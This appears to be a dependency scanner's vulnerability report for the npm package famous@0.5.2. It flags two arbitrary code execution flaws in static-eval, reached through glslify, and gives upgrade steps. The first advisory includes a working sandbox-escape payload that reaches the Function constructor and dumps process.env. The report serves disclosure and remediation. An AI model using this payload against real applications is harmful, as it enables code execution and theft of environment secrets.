Vulnerabilities: 2 (via 4 paths)

Dependencies: 69

Source: npm


high severity

Arbitrary Code Execution

  • Vulnerable module: static-eval
  • Introduced through: glslify@1.6.1

Detailed paths

  • Introduced through: famous@0.5.2 glslify@1.6.1 sleuth@0.1.1 static-eval@0.1.1
  • Introduced through: famous@0.5.2 glslify@1.6.1 static-eval@0.2.4
    Remediation: Upgrade to famous@0.6.0.

Overview

static-eval evaluates statically-analyzable expressions.

Affected versions of this package are vulnerable to Arbitrary Code Execution. They pass untrusted user input directly to the global Function constructor, so an attacker-controlled expression parsed and evaluated via the package can execute arbitrary code.

Proof of concept

// Proof of concept for the vulnerable versions: the expression reaches the
// Function constructor through a property of a built-in and runs the supplied string.
var evaluate = require('static-eval');
var parse = require('esprima').parse;

var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()';
var ast = parse(payload).body[0].expression;
// On a vulnerable version this prints process.env instead of refusing to evaluate the call.
console.log(evaluate(ast, {x:1}));

Remediation

Upgrade static-eval to version 2.0.2 or higher.

high severity

Arbitrary Code Execution

  • Vulnerable module: static-eval
  • Introduced through: glslify@1.6.1

Detailed paths

  • Introduced through: famous@0.5.2 glslify@1.6.1 sleuth@0.1.1 static-eval@0.1.1
  • Introduced through: famous@0.5.2 glslify@1.6.1 static-eval@0.2.4
    Remediation: Upgrade to famous@0.6.0.

Overview

static-eval is a module to evaluate statically-analyzable expressions.

Affected versions of the package are vulnerable to Arbitrary Code Execution. If unsanitized user input is passed to static-eval, it is possible to break out of the sandboxed instance and execute arbitrary code from the standard library.

Remediation

Upgrade static-eval to version 2.0.0 or higher.